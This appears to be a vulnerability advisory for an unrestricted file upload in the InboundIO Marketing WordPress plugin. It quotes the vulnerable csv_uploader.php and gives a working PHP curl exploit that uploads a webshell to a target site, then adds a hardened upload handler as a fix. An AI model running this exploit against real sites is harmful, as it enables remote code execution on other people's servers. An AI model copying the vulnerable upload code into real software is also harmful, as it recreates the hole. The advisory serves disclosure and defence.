<ul><li>/admin/partials/csv_uploader.php<br></li></ul><pre class=""><?php
$ds = DIRECTORY_SEPARATOR; //1
$storeFolder = 'uploaded_csv'; //2
if (!empty($_FILES)) {
$_FILES['file']['name'] = preg_replace('/[^A-Za-z0-9 _ .-]/', '', $_FILES['file']['name']); // strips unusual characters only; '.' is allowed, so any extension survives
$_FILES['file']['name'] = preg_replace('/\s+/', '_', $_FILES['file']['name']);
$tempFile = $_FILES['file']['tmp_name']; //3
$size = $_FILES['file']['size'];
$targetPath = dirname( __FILE__ ) . $ds. $storeFolder . $ds; //4 web-reachable directory beside this script
$targetFile = $targetPath. $_FILES['file']['name']; //5 client-controlled name and extension kept as-is
move_uploaded_file($tempFile,$targetFile); //6 no extension or content check before the move
$path = "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
echo dirname($path)."/uploaded_csv/".$_FILES['file']['name']." ".$size;
}
?>
</pre><p>csv_uploader.php performs no filtering of the uploaded file's type or extension (only a character whitelist on its name), so arbitrary files can be uploaded directly, resulting in getshell.<br></p><p>Exploit payload:</p><pre class=""> <?php
$postData = array();
$postData[ 'file' ] = "@k3dz.php"; #Shell_2_Exec ;)
$dz = curl_init();
curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php");
curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($dz, CURLOPT_POST, 1);
curl_setopt($dz, CURLOPT_POSTFIELDS, $postData );
curl_setopt($dz, CURLOPT_TIMEOUT, 0);
$buf = curl_exec ($dz);
curl_close($dz);
unset($dz);
echo $buf;
?>
</pre><p>Run:</p><pre class="">php payload.php</pre><p>A webshell is obtained.</p><p><img alt="1434003617401-83D13E86-AA58-4DE3-B54D-258BEC77E21F.png" src="https://images.seebug.org/@/uploads/1434392185703-1434003617401-83D13E86-AA58-4DE3-B54D-258BEC77E21F.png" data-image-size="836,49"><br></p>
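<p>A hardened version of the upload handler, added here as an example and not the plugin's own patch: it requires an authorized WordPress user, accepts only a .csv extension with text content, stores the file under a random name in a directory assumed to sit outside the web root, and returns an opaque id instead of a reachable URL. The storage path and the <code>upload_files</code> capability are assumptions.</p>

```php
<?php
// Added example of a hardened csv_uploader handler (not the plugin's own fix).
// Assumptions: runs inside WordPress (current_user_can is available), and
// $storeFolder points to a directory that is NOT served by the web server.
$storeFolder = '/var/lib/wp-private/uploaded_csv'; // assumed non-web-root path

// 1. Reject unauthenticated or unprivileged callers; the original accepted anyone.
if (!function_exists('current_user_can') || !current_user_can('upload_files')) {
    http_response_code(403);
    exit;
}

function accept_csv_upload(array $file, string $storeFolder): ?string
{
    // 2. Only a completed, genuine upload is considered.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // 3. Extension allow-list: .csv only (the original allowed any extension).
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if ($ext !== 'csv') {
        return null;
    }
    // 4. Content check: a PHP script is detected as text/x-php, not plain text.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ['text/plain', 'text/csv'], true)) {
        return null;
    }
    // 5. Never reuse the client-supplied name: random name, fixed extension.
    $name = bin2hex(random_bytes(16)) . '.csv';
    if (!is_dir($storeFolder) && !mkdir($storeFolder, 0700, true)) {
        return null;
    }
    $target = rtrim($storeFolder, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return null;
    }
    return $name;
}

if (!empty($_FILES['file'])) {
    $stored = accept_csv_upload($_FILES['file'], $storeFolder);
    // 6. Return only an opaque identifier, never a URL to the stored file.
    header('Content-Type: application/json');
    echo json_encode($stored === null ? ['error' => 'rejected'] : ['id' => $stored]);
}
```

<p>If the storage directory must remain under the web root, additionally deny script execution there at the web-server level so that a file that slips through the checks cannot be run.</p>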